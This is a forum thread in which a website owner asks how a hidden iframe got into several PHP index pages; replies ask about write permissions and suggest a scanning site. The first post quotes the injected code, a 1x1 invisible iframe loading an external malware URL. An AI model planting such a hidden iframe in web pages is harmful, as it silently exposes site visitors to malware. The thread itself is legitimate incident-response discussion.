Find the answer to your Linux question:
Results 1 to 4 of 4
Hi there, Recently some users told me that their antivirus software prompts them when they visit my web site telling them that some malware is present. Now my site was ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. 05-14-2009 #1
    ddaas
    ddaas is offline
    Just Joined!
    Join Date
    Jan 2005
    Location
    Germany
    Posts
    69

    iframe worm or malware infected my php pages

    Hi there,
    Recently some users told me that their antivirus software prompts them when they visit my web site telling them that some malware is present.
    Now my site was reported as suspicious and Firefox and IE block access to it. Google also suspended my adwords account.

    After some researches I've found that someone/something inserted the code:
    Code:

    <iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">

    on some index.php files (not all of them) and only from one web site (on the server there are many websites hosted).

    On the server runs Apache/2.2.11 (FreeBSD).

    I've removed the code but the problem could reappear so I must get to the source: how was the code inserted, by whom and if the server is compromised?

    Does anyone know something about this? What should I do further?

    rkhunter and chkrootkit say that everything is ok.

    Thanks you
    Reply With Quote Reply With Quote
  2. 05-14-2009 #2
    b2bwild
    b2bwild is offline
    Linux Engineer b2bwild's Avatar
    Join Date
    Jul 2008
    Location
    Behind You!
    Posts
    1,108
    Do you keep write permissions for all on your document root?
    Never make any misteaks.

    Read my Blog at --> Penguin Inside Subscribe Feed
    Reply With Quote Reply With Quote
  3. 05-15-2009 #3
    davidanand
    davidanand is offline
    Linux Newbie
    Join Date
    Apr 2008
    Location
    India
    Posts
    170
    Hi,

    Use this site to check the vulnerability
    Website Security Check - Unmask Parasites
    it gives the detailed report
    Regards
    David.s
    davidanands.co.cc
    -->Success is the list of failures ...!!!
    Reply With Quote Reply With Quote
  4. 05-15-2009 #4
    MikeTbob
    MikeTbob is offline
    Administrator MikeTbob's Avatar
    Join Date
    Apr 2006
    Location
    Texas
    Posts
    7,733
    Quote Originally Posted by davidanand View Post
    Hi,

    Use this site to check the vulnerability
    Website Security Check - Unmask Parasites
    it gives the detailed report
    Very cool Link!!
    Thanks for that, I'm proud to report Linuxforums is mal/spy/adware free!
    Last edited by MikeTbob; 05-15-2009 at 10:58 PM. Reason: Typos
    I do not respond to private messages asking for Linux help, Please keep it on the forums only.
    All new users please read this.** Forum FAQS. ** Adopt an unanswered post.
    I'd rather be lost at the lake than found at home.
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules